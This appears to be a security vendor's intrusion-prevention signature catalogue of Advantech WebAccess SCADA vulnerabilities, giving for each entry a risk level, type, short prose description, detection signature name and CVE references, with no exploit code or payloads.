CVE-2018-14816
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14816

Advantech-WebAccess-SCADA-Bwocxrun.ocx-Command-Execution

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-579-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Input Validation

Description:

A command execution vulnerability exists in Advantech WebAccess SCADA software. This is due to insufficient input validation on the first parameter of the CreateProcess function of the bwocxrun.ocx ActiveX control. A remote, unauthenticated attacker could exploit this vulnerability by enticing a vulnerable user to open a crafted web page. Successful exploitation could lead to OS command execution within the security context of the user.

Situation:

File-Text_Advantech-WebAccess-SCADA-Bwocxrun.ocx-Command-Execution

References:

CVE-2014-0773
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0773

BID-66742
http://www.securityfocus.com/bid/66742

OSVDB-105571
http://www.osvdb.org/105571

Advantech-WebAccess-Scada-Bwopcbs-Stack-Based-Buffer-Overflow

About this vulnerability:	A vulnerability in Advantech WebAccess
Risk:	Moderate
First detected in:	sgpkg-ips-1213-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Advantech WebAccess
Type:	Buffer Overflow
Description:	A stack-based buffer overflow vulnerability has been reported in Advantech WebAccess. The vulnerability is due to a lack of boundary checks while copying user-supplied data into a stack-based buffer within BwOpcBs.exe. A remote, unauthenticated attacker could exploit this vulnerability by sending a maliciously crafted RPC request to the target server. Successful exploitation could lead to arbitrary code execution in the security context of Administrator.
Situation:	MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwopcbs-Stack-Based-Buffer-Overflow

Advantech-WebAccess-Scada-Bwpalarm-IOCTL-70022-Heap-Buffer-Overflow

About this vulnerability:	A vulnerability in Advantech WebAccess
Risk:	Moderate
First detected in:	sgpkg-ips-1240-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Advantech WebAccess
Type:	Buffer Overflow
Description:	Improper handling of user-sent data in RPC requests causes a heap-based buffer overflow vulnerability. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation:	MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwpalarm-IOCTL-70022-Heap-Buffer-Overflow

Advantech-WebAccess-Scada-Bwpalarm-IOCTL-70533-Stack-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

High

First detected in:

sgpkg-ips-1213-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Buffer Overflow

Description:

A stack-based buffer overflow vulnerability has been reported in the webvrpcs service of Advantech WebAccess. The vulnerability is due to a lack of boundary checks while copying user-supplied data into a stack-based buffer within the LogInfoFormat function in BwPAlarm.dll. A remote, unauthenticated attacker could exploit this vulnerability by sending a maliciously crafted RPC request to the target server. Successful exploitation could lead to arbitrary code execution under context of Administrator.

Situation:

MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwpalarm-IOCTL-70533-Stack-Based-Buffer-Overflow

References:

CVE-2019-3951
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3951

Advantech-WebAccess-Scada-Bwpalarm-IOCTL-70538-Stack-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-1183-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Buffer Overflow

Description:

Improper handling of user-sent data in RPC requests causes a stack-based buffer overflow vulnerability. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwpalarm-IOCTL-70538-Stack-Based-Buffer-Overflow

References:

CVE-2019-10991
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10991

Advantech-WebAccess-Scada-Bwpalarm-IOCTL-70603-Stack-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-1193-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Buffer Overflow

Description:

Improper handling of user-sent data in RPC requests causes a stack-based buffer overflow vulnerability. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwpalarm-IOCTL-70603-Stack-Based-Buffer-Overflow

References:

CVE-2019-3975
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3975

Advantech-WebAccess-Scada-Bwpalarm-IOCTL-70605-Stack-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-1179-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Buffer Overflow

Description:

Improper handling of user-sent data in RPC requests causes a stack-based buffer overflow vulnerability. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwpalarm-IOCTL-70605-Stack-Based-Buffer-Overflow

References:

CVE-2019-10991
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10991

Advantech-WebAccess-Scada-Bwpalarm.dll-Stack-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-1125-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Buffer Overflow

Description:

Lack of proper boundary checks while copying user-supplied data into a buffer within BwPAlarm.dll causes a stack-based buffer overflow vulnerability in Advantech WebAceess. A successful exploit allows an attacker to execute arbitrary code on the target system with Administrator privileges.

Situation:

MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwpalarm.dll-Stack-Based-Buffer-Overflow

References:

CVE-2018-18999
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18999

Advantech-WebAccess-Scada-Bwpslinkzip-Stack-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-1108-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Buffer Overflow

Description:

Improper handling of user-sent data in RPC requests causes a stack-Based buffer overflow vulnerability- A successful exploit allows an attacker to execute arbitrary code on the target system

Situation:

MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwpslinkzip-Stack-Based-Buffer-Overflow

References:

CVE-2018-7499
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7499

Advantech-WebAccess-Scada-Bwrunmie.exe-Policy-Bypass

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-1209-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Malfunction

Description:

Situation:

MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwrunmie.exe-Policy-Bypass

References:

CVE-2019-13552
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13552

Advantech-WebAccess-Scada-Bwrunrpt.exe-Stack-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-1206-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Buffer Overflow

Description:

Improper handling of user-sent data in RPC requests causes a stack-based buffer overflow vulnerability. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwrunrpt.exe-Stack-Based-Buffer-Overflow

References:

CVE-2019-13556
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13556

Advantech-WebAccess-Scada-Bwscrp.exe-Stack-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-1208-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Buffer Overflow

Description:

Improper handling of user-sent data in RPC requests causes a stack-based buffer overflow vulnerability. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwscrp.exe-Stack-Based-Buffer-Overflow

References:

CVE-2019-10991
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10991

Advantech-WebAccess-SCADA-bwstwww-Stack-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

High

First detected in:

sgpkg-ips-1153-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Buffer Overflow

Description:

A stack based buffer overflow vulnerability in Advantech WebAccess which allows remote attackers to execute arbitrary code by sending a maliciously crafted RPC request, due to the lack of boundary checks while copying user-supplied data into a buffer within bwstwww.exe.

Situation:

MSRPC-TCP_CPS-Advantech-WebAccess-SCADA-bwstwww-Stack-Based-Buffer-Overflow

References:

CVE-2019-6550
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6550

Advantech-WebAccess-SCADA-Bwthinfl-Stack-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

High

First detected in:

sgpkg-ips-1189-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Buffer Overflow

Description:

Situation:

MSRPC-TCP_Advantech-WebAccess-SCADA-Bwthinfl-Stack-Based-Buffer-Overflow

References:

CVE-2019-6550
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6550

Advantech-WebAccess-Scada-Certupdate.asp-Filename-Directory-Traversal

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-1045-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Input Validation

Description:

Insufficient validation of HTTP requests causes a directory traversal vulnerability in Advantech WebAccess. A successful attack allows arbitrary code execution on the target system.

Situation:

HTTP_CSH-Advantech-WebAccess-Scada-Certupdate.asp-Filename-Directory-Traversal

References:

CVE-2018-5445
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5445

Advantech-WebAccess-Scada-Giffconv-Stack-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-1156-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Buffer Overflow

Description:

A lack of boundary checks while copying request data into a stack-based buffer within giffconv.exe causes a buffer overflow vulnerability in Advantech WebAccess. A successful exploit may allow an attacker to execute arbitrary code on the target system.

Situation:

MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Giffconv-Stack-Based-Buffer-Overflow

References:

CVE-2019-6550
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6550

Advantech-WebAccess-Scada-Gmicons-Picfile-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-1048-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Input Validation

Description:

Insufficient validation of request parameters causes a file upload vulnerability in Advantech WebAccess. A successful exploit allows arbitrary code to be executed with the privileges of the server process.

Situation:

HTTP_CS-Advantech-WebAccess-Scada-Gmicons-Picfile-Arbitrary-File-Upload

References:

CVE-2017-16736
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16736

Advantech-WebAccess-Scada-IOCTL-10001-Bwflapp.exe-Arbitrary-File-Deletion

About this vulnerability:	A vulnerability in Advantech WebAccess
Risk:	Moderate
First detected in:	sgpkg-ips-1248-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Advantech WebAccess
Type:	Directory Traversal
Description:	Improper handling of user-sent data in RPC requests causes a heap-based buffer overflow vulnerability. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation:	MSRPC-TCP_CPS-Advantech-WebAccess-Scada-IOCTL-10001-Bwflapp.exe-Arbitrary-File-Deletion

Advantech-WebAccess-Scada-IOCTL-10001-Bwpfile-Arbitrary-File-Deletion

About this vulnerability:	A vulnerability in Advantech WebAccess
Risk:	Moderate
First detected in:	sgpkg-ips-1252-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Advantech WebAccess
Type:	Directory Traversal
Description:	Improper validation of paths in requests causes an arbitrary file deletion vulnerability in Advantech WebAccess. A successful exploit allows an attacker to delete arbitrary files on the target system.
Situation:	MSRPC-TCP_CPS-Advantech-WebAccess-Scada-IOCTL-10001-Bwpfile-Arbitrary-File-Deletion

Advantech-WebAccess-SCADA-IOCTL-10001-Bwpslink.exe-Arbitrary-File-Deletion

About this vulnerability:	A vulnerability in Advantech WebAccess
Risk:	High
First detected in:	sgpkg-ips-1257-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Advantech WebAccess
Type:	Directory Traversal
Description:	An arbitrary file deletion vulnerability has been reported in Advantech WebAccess. The vulnerability is due to insufficient validation on user supplied paths before using them in file operations within BwPSLink.exe. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the target system. Successful exploitation results in the deletion of arbitrary files from the target system under the context of Administrator user.
Situation:	MSRPC-TCP_CPS-Advantech-WebAccess-SCADA-IOCTL-10001-Bwpslink.exe-Arbitrary-File-Deletion

Advantech-WebAccess-Scada-IOCTL-10012-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-1173-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Buffer Overflow

Description:

Improper handling of user-sent data in RPC requests causes a stack-based buffer overflow vulnerability. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

MSRPC-TCP_CPS-Advantech-WebAccess-Scada-IOCTL-10012-Stack-Buffer-Overflow

References:

CVE-2019-3953
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3953

Advantech-WebAccess-Scada-IOCTL-10040-Arbitrary-File-Deletion

About this vulnerability:	A vulnerability in Advantech WebAccess
Risk:	Moderate
First detected in:	sgpkg-ips-1246-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Advantech WebAccess
Type:	Directory Traversal
Description:	Improper handling of user-sent data in RPC requests causes a heap-based buffer overflow vulnerability. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation:	MSRPC-TCP_CPS-Advantech-WebAccess-Scada-IOCTL-10040-Arbitrary-File-Deletion

Advantech-WebAccess-Scada-Jpegconv-Stack-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-1185-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Buffer Overflow

Description:

Improper boundary checks when processing user-sent data in RPC requests causes a stack-based buffer overflow vulnerability. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Jpegconv-Stack-Based-Buffer-Overflow

References:

CVE-2019-6550
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6550

Advantech-WebAccess-Scada-Notify2-Stack-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-1110-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Buffer Overflow

Description:

Improper handling of user-sent data in RPC requests causes a stack-based buffer overflow vulnerability om Advantech WebAccess. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Notify2-Stack-Based-Buffer-Overflow

References:

CVE-2018-7499
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7499

Advantech-WebAccess-SCADA-Password-Parameter-Buffer-Overflow

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

High

First detected in:

sgpkg-ips-604-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Buffer Overflow

Description:

A stack buffer overflow exists in Advantech's WebAccess SCADA software. The vulnerability is due to insufficient input validation of the Password parameter in an ActiveX control that is part of the WebAccess Client. A remote, unauthenticated attacker could exploit this vulnerability by enticing a vulnerable user to open a crafted web page. Successful exploitation could lead to code execution in the context of the target user.

Situation:

File-Text_Advantech-WebAccess-SCADA-Password-Parameter-Buffer-Overflow

References:

CVE-2014-0992
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0992

BID-69538
http://www.securityfocus.com/bid/69538

OSVDB-110687
http://www.osvdb.org/110687

Advantech-WebAccess-SCADA-Projectname-Parameter-Buffer-Overflow

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

High

First detected in:

sgpkg-ips-604-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Buffer Overflow

Description:

A stack buffer overflow exists in Advantech's WebAccess SCADA software. The vulnerability is due to insufficient input validation of the ProjectName parameter contained in the webvact.ocx ActiveX control, a part of the WebAccess Client. A remote, unauthenticated attacker could exploit this vulnerability by enticing a vulnerable user to open a crafted web page. Successful exploitation could lead to code execution in the context of the target user.

Situation:

File-Text_Advantech-WebAccess-SCADA-Projectname-Parameter-Buffer-Overflow

References:

CVE-2014-0991
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0991

BID-69536
http://www.securityfocus.com/bid/69536

OSVDB-110686
http://www.osvdb.org/110686

Advantech-WebAccess-Scada-Wadashboard-Readfile-Directory-Traversal

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-1117-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Directory Traversal

Description:

There has been reported a directory traversal vulnerability in Advantech WebAccess. Due to an insufficient validation of user input, a remote attacker can read arbitrary file content on the target server.

Situation:

HTTP_CSU-Advantech-WebAccess-Scada-Wadashboard-Readfile-Directory-Traversal

References:

CVE-2018-15706
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15706

Advantech-WebAccess-Scada-Wadashboard-Writefile-Arbitrary-File-Overwrite

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-1119-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Directory Traversal

Description:

Improper input validation causes an arbitrary file overwrite vulnerability in Advantech WebAccess. A successful exploit allows an attacker to overwrite arbitrary files on the target system, allowing them to run arbitrary code.

Situation:

HTTP_CRL-Advantech-WebAccess-Scada-Wadashboard-Writefile-Arbitrary-File-Overwrite

References:

CVE-2018-15705
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15705

Advantech-WebAccess-SCADA-Webeye.ocx-IP_Addr-Parameter-Buffer-Overflow

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-622-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Buffer Overflow

Description:

A stack buffer overflow exists in Advantech's WebAccess SCADA software. The vulnerability is due to insufficient input validation of the ip_addr parameter contained in the webeye.ocx ActiveX control, a part of the WebAccess Client. A remote, unauthenticated attacker could exploit this vulnerability by enticing a vulnerable user to open a crafted web page. Successful exploitation could lead to code execution in the context of the target user.

Situation:

File-Text_Advantech-WebAccess-SCADA-Webeye.ocx-Obsolete-ActiveX-Control-Usage

References:

CVE-2014-8388
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8388

BID-71193
http://www.securityfocus.com/bid/71193

OSVDB-114842
http://www.osvdb.org/114842

Advantech-WebAccess-SCADA-Webvact.ocx-Accesscode-Buffer-Overflow

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-587-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Buffer Overflow

Description:

A stack buffer overflow exists in Advantech's WebAccess SCADA software. This is due to insufficient input validation on the AccessCode parameter of the webvact.ocx ActiveX control, a part of the WebAccess Client. A remote, unauthenticated attacker could exploit this vulnerability by enticing a vulnerable user to open a crafted web page. Successful exploitation could lead to code execution in the context of the target user.

Situation:

File-Text_Advantech-WebAccess-SCADA-Webvact.ocx-Accesscode-Buffer-Overflow

References:

CVE-2014-0767
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0767

BID-66728
http://www.securityfocus.com/bid/66728

BID-66732
http://www.securityfocus.com/bid/66732

OSVDB-105566
http://www.osvdb.org/105566

OSVDB-105567
http://www.osvdb.org/105567

Advantech-WebAccess-SCADA-Webvact.ocx-GotoCmd-Buffer-Overflow

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-1098-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Buffer Overflow

Description:

A stack buffer overflow exists in Advantech's WebAccess SCADA software. This is due to insufficient input validation on the GotoCmd parameter of the webvact.ocx ActiveX control, a part of the WebAccess Client. A remote, unauthenticated attacker could exploit this vulnerability by enticing a vulnerable user to open a crafted web page. Successful exploitation could lead to code execution in the context of the target user.

Situation:

File-Text_Advantech-WebAccess-SCADA-Webvact.ocx-GotoCmd-Buffer-Overflow

References:

CVE-2014-0765
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0765

BID-66722
http://www.securityfocus.com/bid/66722

OSVDB-105564
http://www.osvdb.org/105564

Advantech-WebAccess-SCADA-Webvact.ocx-NodeName-Buffer-Overflow

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-580-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Buffer Overflow

Description:

A stack buffer overflow exists in Advantech's WebAccess SCADA software. This is due to insufficient input validation on the NodeName parameter of the webvact.ocx ActiveX control, a part of the WebAccess Client. A remote, unauthenticated attacker could exploit this vulnerability by enticing a vulnerable user to open a crafted web page. Successful exploitation could lead to code execution in the context of the target user.

Situation:

File-Text_Advantech-WebAccess-SCADA-Webvact.ocx-NodeName-Buffer-Overflow

References:

CVE-2014-0764
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0764

BID-66718
http://www.securityfocus.com/bid/66718

BID-66725
http://www.securityfocus.com/bid/66725

OSVDB-105573
http://www.osvdb.org/105573

OSVDB-105565
http://www.osvdb.org/105565

Advantech-WebAccess-SCADA-Webvact.ocx-Username-Buffer-Overflow

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-578-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Buffer Overflow

Description:

A stack buffer overflow exists in Advantech's WebAccess SCADA software. This is due to insufficient input validation on the UserName parameter of the webvact.ocx ActiveX control, a part of the WebAccess Client. A remote, unauthenticated attacker could exploit this vulnerability by enticing a vulnerable user to open a crafted web page. Successful exploitation could lead to code execution in the context of the target user.

Situation:

File-Text_Advantech-WebAccess-SCADA-Webvact.ocx-Username-Buffer-Overflow

References:

CVE-2014-0770
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0770

BID-66733
http://www.securityfocus.com/bid/66733

OSVDB-105567
http://www.osvdb.org/105567

Advantech-WebAccess-Soap-Request-SQL-Injection

About this vulnerability:

An Advantech WebAccess Soap Request SQL Injection vulnerability

Risk:

High

First detected in:

sgpkg-ips-779-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Input Validation

Description:

A vulnerability in Advantech WebAccess, versions 7.1 and before, which allows remote attackers to gain username and password information by executing arbitrary SQL commands via SOAP requests to ChartThemeConfig.svc.

Situation:

HTTP_CRL-Advantech-WebAccess-Soap-Request-SQL-Injection

References:

CVE-2014-0763
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0763

BID-66740
http://www.securityfocus.com/bid/66740

OSVDB-105572
http://www.osvdb.org/105572

Advantech-WebAccess-SQL-Injection

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

High

First detected in:

sgpkg-ips-607-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Malfunction

Description:

There is an SQL injection vulnerability in Advantech WebAccess which may allow remote authenticated users to execute SQL commands via a malformed URL.

Situation:

HTTP_CSU-Advantech-WebAccess-SQL-Injection

References:

CVE-2012-1234
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1234

Advantech-WebAccess-Stack-Based-Buffer-Overflow

About this vulnerability:

An Advantech WebAccess Stack Based Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-697-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Buffer Overflow

Description:

A stack based buffer overflow in Advantech WebAccess, versions before 7.2, which allow remote attackers to execute arbitrary code via a long string in the following parameters: ProjectName, SetParameter, NodeName, CCDParameter, SetColor, AlarmImage, GetParameter, GetColor, ServerResponse, SetBaud, and IPAddress.

Situation:

File-Text_Advantech-WebAccess-Stack-Based-Buffer-Overflow

References:

CVE-2014-2364
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2364

BID-68714
http://www.securityfocus.com/bid/68714

Advantech-WebAccess-Updatetemplate.aspx-SQL-Injection

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-844-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Input Validation

Description:

Insufficient validation of the parameters given to updateTemplate.aspx results in an SQL injection vulnerability in Advantech WebAccess. A successful exploitation allows an attacker to read and modify information in the database.

Situation:

HTTP_CRL-Advantech-WebAccess-Updatetemplate.aspx-SQL-Injection

References:

CVE-2017-5154
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5154

Advantech-WebAccess-Viewdll1-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-1086-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Buffer Overflow

Description:

Improper validation of the length of user-supplied data before copying it to a fixed-length heap buffer causes a heap buffer overflow vulnerability in Advantech WebAccess. A successful exploit may allow an attacker to execute arbitrary code on the target system.

Situation:

MSRPC-TCP_CPS-Advantech-WebAccess-Viewdll1-Heap-Buffer-Overflow

References:

CVE-2018-8845
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8845

Advantech-WebAccess-Webdobj-ActiveX-Updateproject-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

High

First detected in:

sgpkg-ips-687-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Buffer Overflow

Description:

There exists a stack buffer overflow vulnerability in Advantech's WebAccess SCADA software. A successful exploitation could result in code execution in the security context of the target user.

Situation:

File-TextId_Advantech-WebAccess-Webdobj-ActiveX-Updateproject-Stack-Buffer-Overflow
File-Text_Advantech-WebAccess-Webdobj-ActiveX-Updateproject-Stack-Buffer-Overflow

References:

CVE-2014-9208
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9208

Advantech-WebAccess-Webvrpcs-Arbitrary-File-Deletion

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-1082-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Directory Traversal

Description:

Improper validation of paths in requests causes an arbitrary file deletion vulnerability in Advantech WebAccess. A successful exploit allows an attacker to delete arbitrary files on the target system.

Situation:

MSRPC-TCP_CPS-Advantech-WebAccess-Webvrpcs-Arbitrary-File-Deletion

References:

CVE-2018-7495
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7495

Advantech-WebAccess-Webvrpcs-Directory-Traversal-Remote-Code-Execution

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

High

First detected in:

sgpkg-ips-1080-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Directory Traversal

Description:

There has been reported a directory traversal and remote code execution vulnerability in Advantech WebAccess software. A remote unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted request to the target service. Successful exploitation could lead to remote code execution.

Situation:

MSRPC-TCP_CPS-Advantech-WebAccess-Webvrpcs-Directory-Traversal-Remote-Code-Execution

References:

CVE-2017-16720
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16720

BID-102424
http://www.securityfocus.com/bid/102424

Advantech-WebAccess-Webvrpcs-Projectname-Buffer-Overflow

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-1321-5242

Last changed:

sgpkg-ips-1321-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Malfunction

Description:

There exists a buffer overflow vulnerability in Advantech WebAccess.

Situation:

MSRPC-TCP_CPS-Advantech-WebAccess-Webvrpcs-Projectname-Buffer-Overflow

References:

CVE-2016-0856
